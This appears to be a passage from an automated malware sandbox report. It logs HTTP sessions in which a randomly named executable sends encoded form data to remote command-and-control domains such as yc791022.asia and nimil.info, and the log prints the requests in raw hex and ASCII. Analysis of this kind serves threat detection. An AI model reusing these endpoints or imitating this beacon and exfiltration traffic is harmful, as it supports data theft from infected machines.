                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 64 43 61 45 73 6c 54 56 51 6a 5a 38 35 72 35 77 79 70 41 59 6f 71 30 2f 54 33 72 62 33 6b 31 48 57 71 39 7a 5a 63 37 64 74 76 48 7a 31 4d 4f 71 73 6f 4d 6e 76 76 34 53 56 69 51 5a 76 6f 6e 79 31 66 49 72 44 6c 53 76 64 63 39 7a 7a 43 68 41 71 62 58 35 31 52 6b 57 53 36 58 6b 78 76 68 7a 66 6c 64 36 39 58 52 78 37 78 5a 51 30 75 7a 6a 38 39 6a 51 49 35 30 44 2b 6a 32 48 31 31 38 76 5a 4f 6e 67 77 54 73 74 37 59 5a 58 6f 69 32 37 42 36 64 76 71 39 34 2f 56 30 47 38 78 69 63 71 55 2b 38 53 45 68 70 54 58 4b 79 65 7a 46 58 6b 52 63 32 36 69 35 62 6d 62 55 77 71 51 6f 57 42 48 33 63 63 72 79 31 4a 64 5a 6f 48 54 32 78 48 46 4c 51 76 68 43 51 6a 6f 70 78 56 53 47 48 48 73 53 6b 47 69 77 52 36 59 32 57 4a 53 4f 2f 4b 6d 2b 70 38 44 36 64 4b 50 45 6c 78 6c 79 2f 33 64 43 38 71 48 47 69 6f 63 4c 56 37 77 4e 52 78 47 73 33 41 58 52 4d 5a 30 63 52 70 74 73 58 4f 50 61 4f 59 32 4f 2b 65 64 42 34 6a 53 31 35 73 41 4d 57 68 42 67 61 7a 6c 46 66 6c 41 75 54 50 31 58 46 6d 6e 46 62 35 50 56 73 49 65 [TRUNCATED]
                                                                                        Data Ascii: qb6h=dCaEslTVQjZ85r5wypAYoq0/T3rb3k1HWq9zZc7dtvHz1MOqsoMnvv4SViQZvony1fIrDlSvdc9zzChAqbX51RkWS6Xkxvhzfld69XRx7xZQ0uzj89jQI50D+j2H118vZOngwTst7YZXoi27B6dvq94/V0G8xicqU+8SEhpTXKyezFXkRc26i5bmbUwqQoWBH3ccry1JdZoHT2xHFLQvhCQjopxVSGHHsSkGiwR6Y2WJSO/Km+p8D6dKPElxly/3dC8qHGiocLV7wNRxGs3AXRMZ0cRptsXOPaOY2O+edB4jS15sAMWhBgazlFflAuTP1XFmnFb5PVsIeyiiahNMIoV8K0rvp0/Etv0PqkY7RuPHPaR4BOAPEQzP7JP3Xi3QRhhqfvEvpJTTPYiStZpUCkoCUVxXvk4blq6ecDSDv3n4Zdm18gOupixw0oWZ9qWhsC8zSQDUOva1yuqz300wWHVB9ltz1/+pN8DcC2k3SOYstYgJ0rte5yAfGaEs0S0dMJeOfAJDQCJQdXuh4u/9ypnPbgd33yKCJ50JIgCQ3Q5geQlrbAus7RFFm7o4z4i4yoeDjZhGxZ5l1d7DqJpXyF9c6pMyB7BxgVu/sjtTOYUxM2UryFKGZjU1/1liUJQOYbVZMb1A8Oz3qq9yWCMwwPpmXLtFCus7wqXEabpjYXdidAOfRIGuimKpTSToWIFQmz1GyA5oTsjk4YGMZYqURnmKJ70WhFHOTBDs0zcH8sH5oc0XsJflpnSipfa3in8rDNJhE7QGMQexhiWOmvF80T3Qmh9XqdA1Z8WrggoHAZ6qyr5LKwbe7equkPDpkuquMMMzRSJBfh8ANgXyySObtJyKmY89f0NKTV0MY+b45hUif4sYsapwXsEgiWNCDeHfXVdTiIclGftVtfBI3XcyfFrJLuDaZ2v4Q69cR8V4iU+9Ardb5vYCT7kPbSNVgqnzqbzL5KjIf7Q/RfQNqKtaR/QRanmMFEPN1Ffn3MCdV9S1GCd [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.563490156.232.181.155803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:16:53.539083958 CET515OUTGET /c6yl/?qb6h=QAykvSbKcm9a/Zd756st6oc0c2ndg18QAahNUeLfrY6eiOHcgN8hz9hRbXFDsZyrs9wVKyWLGfVe8RlZjLvC3xYEXrLC/N5rcVQ70kVg4GEX58Hw+NfPJKYlgF2/w0JeMA==&X8wps=HD9ptle8L HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Nov 14, 2024 08:16:54.485146046 CET709INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:16:54 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 566
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.563491101.35.209.183803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:01.057511091 CET770OUTPOST /grmn/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.yc791022.asia
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.yc791022.asia
                                                                                        Referer: http://www.yc791022.asia/grmn/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 4c 74 39 69 78 58 6d 36 5a 51 6e 48 2b 31 47 75 69 37 2f 7a 78 45 61 50 6f 30 32 6a 58 61 35 36 71 43 45 45 35 62 47 42 33 42 42 41 33 35 52 2b 61 37 32 4e 63 41 64 2f 48 4c 76 56 71 7a 45 35 58 61 47 76 50 6c 45 48 44 48 38 4a 54 63 52 32 78 50 31 6e 46 68 59 72 48 57 4b 62 65 45 46 6f 70 59 43 6d 5a 75 69 43 55 42 33 59 6f 64 73 69 53 68 75 65 6c 71 4e 4f 79 69 71 64 76 79 5a 42 65 31 5a 66 69 2f 71 45 32 56 46 4b 6f 2b 48 55 2f 55 74 58 44 4f 4e 6b 4c 46 76 6c 76 75 70 78 4f 68 35 52 45 4e 45 43 6c 57 4c 67 74 4e 74 69 65 56 78 5a 72 31 43 43 50 4c 30 6b 51 72 73 48 74 53 32 4a 41 45 34 3d
                                                                                        Data Ascii: qb6h=Lt9ixXm6ZQnH+1Gui7/zxEaPo02jXa56qCEE5bGB3BBA35R+a72NcAd/HLvVqzE5XaGvPlEHDH8JTcR2xP1nFhYrHWKbeEFopYCmZuiCUB3YodsiShuelqNOyiqdvyZBe1Zfi/qE2VFKo+HU/UtXDONkLFvlvupxOh5RENEClWLgtNtieVxZr1CCPL0kQrsHtS2JAE4=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.563492101.35.209.183803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:03.600801945 CET790OUTPOST /grmn/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.yc791022.asia
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.yc791022.asia
                                                                                        Referer: http://www.yc791022.asia/grmn/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 4c 74 39 69 78 58 6d 36 5a 51 6e 48 2f 55 32 75 67 59 58 7a 33 6b 61 4d 74 30 32 6a 46 61 35 2b 71 43 49 45 35 66 57 52 33 7a 31 41 32 59 68 2b 64 2b 43 4e 56 51 64 2f 49 62 75 66 33 6a 45 69 58 61 4c 53 50 6e 51 48 44 48 6f 4a 54 5a 56 32 77 2b 31 6b 45 78 59 74 65 6d 4b 5a 61 45 46 6f 70 59 43 6d 5a 75 32 6f 55 42 2f 59 76 73 38 69 49 41 75 5a 73 4b 4e 4e 31 69 71 64 72 79 5a 46 65 31 59 36 69 2b 48 5a 32 58 4e 4b 6f 2b 33 55 2f 46 74 57 4a 4f 4e 69 47 6c 75 6c 6a 73 38 4f 58 7a 74 77 4d 4f 78 6b 30 6e 4b 62 6f 37 63 49 45 33 35 78 34 56 75 36 66 59 38 54 42 62 4e 75 33 78 6d 35 65 54 73 42 54 30 39 6e 2f 66 6c 50 50 69 38 70 6f 70 44 2f 74 56 63 52
                                                                                        Data Ascii: qb6h=Lt9ixXm6ZQnH/U2ugYXz3kaMt02jFa5+qCIE5fWR3z1A2Yh+d+CNVQd/Ibuf3jEiXaLSPnQHDHoJTZV2w+1kExYtemKZaEFopYCmZu2oUB/Yvs8iIAuZsKNN1iqdryZFe1Y6i+HZ2XNKo+3U/FtWJONiGluljs8OXztwMOxk0nKbo7cIE35x4Vu6fY8TBbNu3xm5eTsBT09n/flPPi8popD/tVcR
                                                                                        Nov 14, 2024 08:17:04.546804905 CET427INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:04 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.563493101.35.209.183803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:06.148840904 CET1807OUTPOST /grmn/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.yc791022.asia
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.yc791022.asia
                                                                                        Referer: http://www.yc791022.asia/grmn/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 4c 74 39 69 78 58 6d 36 5a 51 6e 48 2f 55 32 75 67 59 58 7a 33 6b 61 4d 74 30 32 6a 46 61 35 2b 71 43 49 45 35 66 57 52 33 7a 74 41 33 72 35 2b 64 64 61 4e 48 41 64 2f 4c 62 75 65 33 6a 46 77 58 61 44 57 50 6e 4d 78 44 46 51 4a 42 72 64 32 33 4e 74 6b 4b 78 59 74 57 47 4b 55 65 45 46 39 70 59 53 69 5a 75 6d 6f 55 42 2f 59 76 76 30 69 65 42 75 5a 75 4b 4e 4f 79 69 71 76 76 79 5a 39 65 78 30 4d 69 2b 7a 4a 32 6d 74 4b 74 75 6e 55 39 33 46 57 42 4f 4e 67 48 6c 75 4c 6a 73 67 76 58 7a 68 43 4d 50 45 44 30 67 2b 62 70 64 67 56 64 6b 78 4a 6a 33 43 65 56 76 45 74 64 73 73 4d 2f 6e 6e 4e 55 42 30 45 63 57 52 5a 34 61 74 74 44 43 4a 6d 72 73 2b 71 6f 79 64 78 4c 66 4a 54 6b 69 64 67 63 36 38 32 58 4b 44 73 72 30 44 6a 77 70 53 78 2b 42 77 45 55 65 50 36 47 66 44 6e 74 6b 58 44 6b 68 33 77 35 45 47 47 43 6e 39 56 45 4e 49 6f 54 55 77 52 43 4b 45 4f 47 49 70 4d 35 51 61 31 51 65 6f 47 37 65 56 61 53 71 5a 7a 65 50 30 71 67 45 6e 2b 39 37 62 4e 47 4b 4a 70 59 64 58 4f 67 55 34 79 35 72 33 64 31 [TRUNCATED]
                                                                                        Data Ascii: qb6h=Lt9ixXm6ZQnH/U2ugYXz3kaMt02jFa5+qCIE5fWR3ztA3r5+ddaNHAd/Lbue3jFwXaDWPnMxDFQJBrd23NtkKxYtWGKUeEF9pYSiZumoUB/Yvv0ieBuZuKNOyiqvvyZ9ex0Mi+zJ2mtKtunU93FWBONgHluLjsgvXzhCMPED0g+bpdgVdkxJj3CeVvEtdssM/nnNUB0EcWRZ4attDCJmrs+qoydxLfJTkidgc682XKDsr0DjwpSx+BwEUeP6GfDntkXDkh3w5EGGCn9VENIoTUwRCKEOGIpM5Qa1QeoG7eVaSqZzeP0qgEn+97bNGKJpYdXOgU4y5r3d1ljt61zfEOp3epCk5u5/MGEU004ScVXHR+9wuVGybQFsekzP8IjZfNkMitbwyXAOILQImeyxsmFW+60odPzVuKmwsxNR3LiMCUbwlS82O3YtV60p+H9E1+uPvdTwaeh8OKvDHPi6jWpZL79beHlJSS3Spe0z9BAKCvy7IyvCpw792XAvphirQfWlQuc089EteDAmyxTQiBLX2m+JN2GAqoMlYP89ZrmeedQ1v5jkS9oDBO88ib3bDRDiCbqNYTe3lY9ZwungXgg1uyDd1/5vhUcOMEwO1Sk2CTGWU0roshSVmyANgcNKLxQRibRjD7WkWdxZD0MDO7+03Q+yhtr7EVe/BGNzA91g/g7bi2r8nyt5LI+yc3peddYupyjed1NBobIcsxc9XIcfVMl0ns+Px58xCZdqmoDeXT8iSE2yTECte2gSepn6tVInKLX1vdR1njYOe1FBW5257wK+k0ER5c3WpNS+fb4o4IGxq+IO5+VU+81XD5SiTJ0/UtQDPDsbPR13roSKLOqcb23wKNwVYwKGRy8UhDyekzbf0lEujn0q5S8b4mn/Nz7cLevK/fYpnH+mLqvBydHjrrc6JJtWy30T5bHzQKLiSrdvjxTXZwj2A8lQ2B/bSQLA5tYh+HlLBWOV6EfYiU+p6eaHaiUy7r9hcHOIR8lCWqZ [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:07.326309919 CET427INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:06 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                                                                                        Nov 14, 2024 08:17:07.376334906 CET427INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:06 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.563494101.35.209.183803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:08.688596010 CET512OUTGET /grmn/?qb6h=GvVCyhHHBwWm3Wiqs6T1+HSOrEGLSLVs90U44aOn+V5a+alxbue2HRsnEZvT1CUlYqTASXI2DXs3J4l64Md/MUcibXuAbURyjOW4TtuxIV2IutBvJyuUjqtFtGqljQIKAQ==&X8wps=HD9ptle8L HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.yc791022.asia
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Nov 14, 2024 08:17:09.632874012 CET427INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:09 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.563495203.161.46.205803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:15.874260902 CET761OUTPOST /gdpp/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.nimil.info
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.nimil.info
                                                                                        Referer: http://www.nimil.info/gdpp/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 61 50 4e 72 6d 45 6c 71 79 47 2f 65 62 44 50 61 41 32 69 48 45 35 57 5a 45 59 45 2f 47 6a 32 79 4c 4d 57 50 4b 6d 68 73 2f 4b 63 6c 52 37 54 4e 69 51 68 42 4a 34 51 55 4c 67 55 6c 4f 54 58 74 2f 5a 7a 67 78 66 4a 58 50 68 67 54 6e 58 69 2b 58 33 43 4e 5a 6c 52 77 36 64 73 43 49 2b 74 76 74 49 71 5a 47 52 44 47 41 73 61 44 52 6f 46 50 5a 36 68 4f 65 68 73 37 6d 75 68 6d 61 48 70 43 52 6f 6f 57 77 38 4e 6d 44 72 77 30 68 58 56 76 79 76 4d 4d 6d 78 49 74 30 74 2f 34 75 4f 51 4c 50 4d 42 2f 42 32 6c 6a 6e 71 79 43 78 66 50 54 49 67 42 76 6d 49 44 6b 33 55 31 35 4d 36 76 4a 74 6b 43 57 38 68 4d 3d
                                                                                        Data Ascii: qb6h=aPNrmElqyG/ebDPaA2iHE5WZEYE/Gj2yLMWPKmhs/KclR7TNiQhBJ4QULgUlOTXt/ZzgxfJXPhgTnXi+X3CNZlRw6dsCI+tvtIqZGRDGAsaDRoFPZ6hOehs7muhmaHpCRooWw8NmDrw0hXVvyvMMmxIt0t/4uOQLPMB/B2ljnqyCxfPTIgBvmIDk3U15M6vJtkCW8hM=
                                                                                        Nov 14, 2024 08:17:16.548337936 CET1236INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:16 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
